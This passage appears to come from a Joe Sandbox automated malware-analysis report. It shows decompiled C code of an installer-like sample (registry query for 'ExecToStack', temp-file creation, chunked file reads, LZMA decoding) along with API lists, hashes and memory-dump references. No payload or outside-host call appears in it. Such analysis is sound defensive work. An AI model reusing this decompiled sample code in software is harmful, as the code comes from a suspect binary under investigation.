				if(_t21 >= 0) {
					_t32 = _t21 +  *0x4702b8;
					 *0x42a6d4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E004032DE(4);
				if(_t22 >= 0) {
					_t24 = E00405F61( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x42a6d4 =  *0x42a6d4 + 4;
						_t36 = E004032DE(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x42a6d4 =  *0x42a6d4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E00405F61( *0x40a01c, 0x4266d0, _t28) == 0) {
											goto L18;
										}
										_t30 = E00405F90(_a8, 0x4266d0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x42a6d4 =  *0x42a6d4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}














                                                                                                                                                                                                  0x004031da
                                                                                                                                                                                                  0x004031e3
                                                                                                                                                                                                  0x004031ec
                                                                                                                                                                                                  0x004031f0
                                                                                                                                                                                                  0x004031fb
                                                                                                                                                                                                  0x004031fb
                                                                                                                                                                                                  0x00403203
                                                                                                                                                                                                  0x0040320a
                                                                                                                                                                                                  0x0040321c
                                                                                                                                                                                                  0x00403223
                                                                                                                                                                                                  0x004032c8
                                                                                                                                                                                                  0x004032c8
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403229
                                                                                                                                                                                                  0x0040322c
                                                                                                                                                                                                  0x00403238
                                                                                                                                                                                                  0x0040323c
                                                                                                                                                                                                  0x004032d6
                                                                                                                                                                                                  0x004032d6
                                                                                                                                                                                                  0x00403242
                                                                                                                                                                                                  0x00403245
                                                                                                                                                                                                  0x004032a4
                                                                                                                                                                                                  0x004032aa
                                                                                                                                                                                                  0x004032ac
                                                                                                                                                                                                  0x004032ac
                                                                                                                                                                                                  0x004032be
                                                                                                                                                                                                  0x004032c6
                                                                                                                                                                                                  0x004032cd
                                                                                                                                                                                                  0x004032d0
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403247
                                                                                                                                                                                                  0x0040324a
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403250
                                                                                                                                                                                                  0x00403255
                                                                                                                                                                                                  0x0040325c
                                                                                                                                                                                                  0x0040325f
                                                                                                                                                                                                  0x00403261
                                                                                                                                                                                                  0x00403261
                                                                                                                                                                                                  0x0040326e
                                                                                                                                                                                                  0x00403278
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403281
                                                                                                                                                                                                  0x00403288
                                                                                                                                                                                                  0x004032a0
                                                                                                                                                                                                  0x004032ca
                                                                                                                                                                                                  0x004032ca
                                                                                                                                                                                                  0x0040328a
                                                                                                                                                                                                  0x0040328a
                                                                                                                                                                                                  0x0040328d
                                                                                                                                                                                                  0x00403290
                                                                                                                                                                                                  0x00403296
                                                                                                                                                                                                  0x0040329c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040329e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040329e
                                                                                                                                                                                                  0x0040329c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403288
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403255
                                                                                                                                                                                                  0x0040324a
                                                                                                                                                                                                  0x00403245
                                                                                                                                                                                                  0x0040323c
                                                                                                                                                                                                  0x00403223
                                                                                                                                                                                                  0x004032d8
                                                                                                                                                                                                  0x004032db

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • dlers:o,mutableDefaults:Boolean(y)})};const L=async function*(P,g){let o=_(P,g,v.options);o.resolveBodyOnly=!1;const y=o.pagination;if(!s.default.object(y))throw new TypeError("`options.pagination` must be implemented");const R=[];let{countLimit:C}=y,F=0;for(;, xrefs: 00403250, 00403267, 0040327D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FilePointer
                                                                                                                                                                                                  • String ID: dlers:o,mutableDefaults:Boolean(y)})};const L=async function*(P,g){let o=_(P,g,v.options);o.resolveBodyOnly=!1;const y=o.pagination;if(!s.default.object(y))throw new TypeError("`options.pagination` must be implemented");const R=[];let{countLimit:C}=y,F=0;for(;
                                                                                                                                                                                                  • API String ID: 973152223-1210263621
                                                                                                                                                                                                  • Opcode ID: aa57c99512f3ed14381c346065f5c0a4cc49975fb94f98cb3c0debf99d4161c5
                                                                                                                                                                                                  • Instruction ID: 354a74280fc320ddcd1a03d564711161fa861bb1e5dc1acee3c93741f06a9d18
                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa57c99512f3ed14381c346065f5c0a4cc49975fb94f98cb3c0debf99d4161c5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB316B30200219BBDB109F95ED44A9A3E68EB04759F20417EF904E61D0D7389E51DBA9
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 004062B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 680 4062b6-4062e8 call 406255 683 406326 680->683 684 4062ea-406318 RegQueryValueExW RegCloseKey 680->684 686 40632a-40632c 683->686 684->683 685 40631a-40631e 684->685 685->686 687 406320-406324 685->687 687->683 687->686
                                                                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                                                                  			E004062B6(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x4000;
				_t21 = E00406255(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
					_t21 = RegCloseKey(_a20);
					_t30[0x3ffe] = _t30[0x3ffe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                                                                                                                                                  0x004062c4
                                                                                                                                                                                                  0x004062c6
                                                                                                                                                                                                  0x004062de
                                                                                                                                                                                                  0x004062e3
                                                                                                                                                                                                  0x004062e8
                                                                                                                                                                                                  0x00406326
                                                                                                                                                                                                  0x00406326
                                                                                                                                                                                                  0x004062ea
                                                                                                                                                                                                  0x004062fc
                                                                                                                                                                                                  0x00406307
                                                                                                                                                                                                  0x0040630d
                                                                                                                                                                                                  0x00406318
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406318
                                                                                                                                                                                                  0x0040632c

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00004000,00000002,0043E708,00000000,?,?,ExecToStack,?,?,0040652A,80000002), ref: 004062FC
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,ExecToStack,ExecToStack,ExecToStack,00000000,0043E708), ref: 00406307
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseQueryValue
                                                                                                                                                                                                  • String ID: ExecToStack
                                                                                                                                                                                                  • API String ID: 3356406503-166031814
                                                                                                                                                                                                  • Opcode ID: 7e8f2b507172300fff4d18ea8023ba838134d56d13ff8a7450bb17b0ad457722
                                                                                                                                                                                                  • Instruction ID: 71396637bdf4209a45bd355f469bd078e3083f4a568c77181c36ba1a701e5b4c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e8f2b507172300fff4d18ea8023ba838134d56d13ff8a7450bb17b0ad457722
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2701BC7250020AEBDF218F55CD0AEDB3FA8EF54364F01403AFD16A2190E378DA24CBA4
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00405F0D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 688 405f0d-405f19 689 405f1a-405f4e GetTickCount GetTempFileNameW 688->689 690 405f50-405f52 689->690 691 405f5d-405f5f 689->691 690->689 692 405f54 690->692 693 405f57-405f5a 691->693 692->693
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E00405F0D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a58c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                                                                                                                                                                  0x00405f13
                                                                                                                                                                                                  0x00405f19
                                                                                                                                                                                                  0x00405f1a
                                                                                                                                                                                                  0x00405f1a
                                                                                                                                                                                                  0x00405f1f
                                                                                                                                                                                                  0x00405f20
                                                                                                                                                                                                  0x00405f23
                                                                                                                                                                                                  0x00405f28
                                                                                                                                                                                                  0x00405f2b
                                                                                                                                                                                                  0x00405f35
                                                                                                                                                                                                  0x00405f42
                                                                                                                                                                                                  0x00405f46
                                                                                                                                                                                                  0x00405f4e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405f52
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405f54
                                                                                                                                                                                                  0x00405f54
                                                                                                                                                                                                  0x00405f54
                                                                                                                                                                                                  0x00405f57
                                                                                                                                                                                                  0x00405f5a
                                                                                                                                                                                                  0x00405f5a
                                                                                                                                                                                                  0x00405f5d
                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                                                                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,004C1000,004034A3,004D1000,004D5000,004D5000,004D5000,004D5000,004D5000,746AFAA0,004036EF), ref: 00405F46
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                                                                                                  • String ID: nsa
                                                                                                                                                                                                  • API String ID: 1716503409-2209301699
                                                                                                                                                                                                  • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                                                                                                  • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00405F61 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22fileCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 694 405f61-405f7d ReadFile 695 405f89 694->695 696 405f7f-405f82 694->696 698 405f8b-405f8d 695->698 696->695 697 405f84-405f87 696->697 697->698
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E00405F61(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                                                                                                  0x00405f65
                                                                                                                                                                                                  0x00405f75
                                                                                                                                                                                                  0x00405f7d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405f84
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405f86

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,dlers:o,mutableDefaults:Boolean(y)})};const L=async function*(P,g){let o=_(P,g,v.options);o.resolveBodyOnly=!1;const y=o.pagination;if(!s.default.object(y))throw new TypeError("`options.pagination` must be implemented");const R=[];let{countLimit:C}=y,F=0;for(;,rects:10,prefixUrl:"",methodRewriting:!0,ignoreInvalidCookies:!1,context:{},http2:!1,allowGetBody:!1,https:void 0,pagination:{transform:u=>u.request.options.responseType==="json"?u.body:JSON.parse(u.body),paginate:u=>{if(!Reflect.has(u.headers,"link"))return!1,0040345A,0040A230,0040A230,0040335E,dlers:o,mutableDefaults:Boolean(y)})};const L=async function*(P,g){let o=_(P,g,v.options);o.resolveBodyOnly=!1;const y=o.pagination;if(!s.default.object(y))throw new TypeError("`options.pagination` must be implemented");const R=[];let{countLimit:C}=y,F=0;for(;,00004000,?,00000000,00403208), ref: 00405F75
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • dlers:o,mutableDefaults:Boolean(y)})};const L=async function*(P,g){let o=_(P,g,v.options);o.resolveBodyOnly=!1;const y=o.pagination;if(!s.default.object(y))throw new TypeError("`options.pagination` must be implemented");const R=[];let{countLimit:C}=y,F=0;for(;, xrefs: 00405F64
                                                                                                                                                                                                  • rects:10,prefixUrl:"",methodRewriting:!0,ignoreInvalidCookies:!1,context:{},http2:!1,allowGetBody:!1,https:void 0,pagination:{transform:u=>u.request.options.responseType==="json"?u.body:JSON.parse(u.body),paginate:u=>{if(!Reflect.has(u.headers,"link"))return!1, xrefs: 00405F61
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                                  • String ID: dlers:o,mutableDefaults:Boolean(y)})};const L=async function*(P,g){let o=_(P,g,v.options);o.resolveBodyOnly=!1;const y=o.pagination;if(!s.default.object(y))throw new TypeError("`options.pagination` must be implemented");const R=[];let{countLimit:C}=y,F=0;for(;$rects:10,prefixUrl:"",methodRewriting:!0,ignoreInvalidCookies:!1,context:{},http2:!1,allowGetBody:!1,https:void 0,pagination:{transform:u=>u.request.options.responseType==="json"?u.body:JSON.parse(u.body),paginate:u=>{if(!Reflect.has(u.headers,"link"))return!1
                                                                                                                                                                                                  • API String ID: 2738559852-11301910
                                                                                                                                                                                                  • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                                  • Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00406F27 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 99%
                                                                                                                                                                                                  			E00406F27() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407395))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
